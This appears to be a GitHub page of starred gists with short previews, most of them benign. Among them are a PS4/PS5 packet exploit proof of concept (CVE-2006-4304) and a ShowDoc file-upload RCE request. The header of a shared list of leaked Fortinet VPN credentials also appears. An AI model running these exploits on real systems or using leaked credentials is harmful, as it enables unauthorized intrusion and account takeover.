Skip to content

Instantly share code, notes, and snippets.

View daedalus's full-sized avatar

Darío Clavijo daedalus

269 followers · 499 following
View GitHub Profile
@darkerego
darkerego / CVE-2024-3094_check.sh
Created March 29, 2024 19:07
#! /bin/bash
# Modified to run both (redudantly, yes, I know, I am paranoid, you should be too) checks
#
set -eu
# find path to liblzma used by sshd
path="$(ldd $(which sshd) | grep liblzma | grep -o '/[^ ]*')"
echo 'Check one: does it even exist?'
# does it even exist?
if [ "$path" == "" ]
@RobbedColek
RobbedColek / PS4-PS5-CVE-2006-4304.py
Created January 30, 2024 16:02
PoC of CVE-2006-4304 for PS4/PS5
from scapy.all import PPPoED, Ether, sniff, sendp, srp1, hexdump
source = b"\xXX\xXX\xXX\xXX\xXX\xXX" # MAC address of your adapter on PC
destination = b"\xXX\xXX\xXX\xXX\xXX\xXX" # MAC address of LAN on your PS4
interface = "Realtek PCIe 2.5GbE Family Controller #2" # get via "ipconfig /all" or eth0 or similiar on Linux
packet = sniff(iface=interface, filter="pppoed", count=1)
tag_value = packet[PPPoED][0].tag_list[1].tag_value
payload = destination + source + b"\x88\x63\x11\x07\x00\x00\x00\x0c\x01\x03\x00\x08" + tag_value
sendp(payload, iface=interface)
@a1k0n
a1k0n / donut.c
Created October 23, 2023 04:03
donut shift and add only
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <math.h>
#define debug(...)
//#define debug printf
// torus radii and distance from camera
@mlaprise
mlaprise / more-llms.md
Created April 24, 2023 01:45

Training open-source LLMs on ChatGPT output is a really bad idea.

Everyone is now racing to create open-source alternatives to compete with GPT3.5/GPT4. A common shortcut used by some teams to bootstrap their effort is to fine-tune their model on ChatGPT output. I used to think it was a good idea and totally fair play to do this. Actually, I still think it’s fair play. OpenAI effectively distilled the entire web into its models. They are saying themself that they are using publicly accessible information (mostly). So distilling their model is, in effect, distilling the public open web, so small Term of Service details aside, I don’t see major ethical problems with that. Right? Well, it’s not entirely true and I realized now that, even when ignoring the ethical considerations, using their output is a really bad idea.

First of all, from a purely technical point of view, as @yoavgo is explaining it beautifully in his recent post, there is no way to align LLMs correctly without the RLHF component. I encourag

@juliusgeo
juliusgeo / gauss-legendre.md
Created March 3, 2023 23:50

20 million digits of pi in under a minute with Julia

I recently discovered a relatively obscure algorithm for calculating the digits of pi: https://en.wikipedia.org/wiki/Gauss–Legendre_algorithm. Well, at least obscure compared to Chudnovsky's. Wikipedia notes that it is "memory-intensive" but is it really? Let's compare to the MPFR pi function:

function gauss_legendre(prec)
    setprecision(BigFloat, prec, base=10)
    GC.enable(false)
@juliusgeo
juliusgeo / rijndael.py
Last active April 19, 2023 23:41
n=256;q, t, m, e, p, c, f=(range(n),16,lambda x
,y, r=0:m((h:=x <<1,h^283)[
h&n!= 0],y>> 1,(r,r ^x)
[y&1])if y else r,lambda
a,w= 1,p=n -2:e(m(a, a),(w,m
(w,a))[p&1] ,p>> 1)if p
else w, lambda b: list(
map (print,["%.2x "*t%(*b[r:r+t],)for
r in [*q][::t]])),lambda a,i: (a<<i|a>>8-i)&255
,lambda a: (a^c(a,1)^c(a,2)^c(a,3)^c(a,4))^99);
@crypto-cypher
crypto-cypher / fortinet_victim_list_2021.txt
Last active February 7, 2023 23:46
Fortinet Victim List - "Hackers leak passwords for 500,000 Fortinet VPN accounts" #TrackThePlanet
This file has been truncated, but you can view the full file.
##### COURTESY
# @CuratedIntel
# https://curatedintel.org
##### BACKGROUND
# Initally shared on RAMP ransomware forum
# Last shared on Groove ransomware extortion website
# Publicized by Bleeping Computer, which led to this post being issued to help blue teamers
# https://www.bleepingcomputer.com/news/security/hackers-leak-passwords-for-500-000-fortinet-vpn-accounts/
@pikpikcu
pikpikcu / showdoc-rce.md
Created April 21, 2021 07:33 
POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Content-Length: 239
Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633
Accept-Encoding: gzip

----------------------------835846770881083140190633
Content-Disposition: form-data; name="editormd-image-file"; filename="test.&lt;&gt;php"
@LiveOverflow
LiveOverflow / hireme.ipynb
Created November 20, 2020 10:46
Hire me!!!!!!!!
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@animetosho
animetosho / galois-field-affine-uses.md
Last active February 6, 2024 00:42
A list of “out-of-band” uses for the GF2P8AFFINEQB instruction I haven’t seen documented elsewhere

Count Leading/Trailing Zero Bits (Byte-wise)

Counting the trailing zero bit count (TZCNT) can be done by isolating the lowest bit, then depositing this into the appropriate locations for the count. The leading zero bit count (LZCNT) can be done by reversing bits, then computing the TZCNT.

__m128i _mm_tzcnt_epi8(__m128i a) {
	// isolate lowest bit
	a = _mm_andnot_si128(_mm_add_epi8(a, _mm_set1_epi8(0xff)), a);
	// convert lowest bit to index